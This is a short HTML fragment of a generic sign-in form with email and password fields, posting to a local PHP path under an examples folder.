
    <form id="signin__form" class="signin__form" action="/php/website/examples/facebook.com/?sign_in" method="post" autocomplete="">
        <h2>Sign in to your account</h2>
        <div class="form-row">
            <label for="input__email">Email address</label>
            <input id="input__email" name="input__email" type="email" placeholder="Enter your email address">
        </div>
        <div class="form-row">
            <label for="input__password">Password</label>
            <input id="input__password" name="input__password" type="password" placeholder="Enter your password">
        </div>

        <div class="form-row">
            <button type="submit">Sign in</button>
        </div>
    </form>
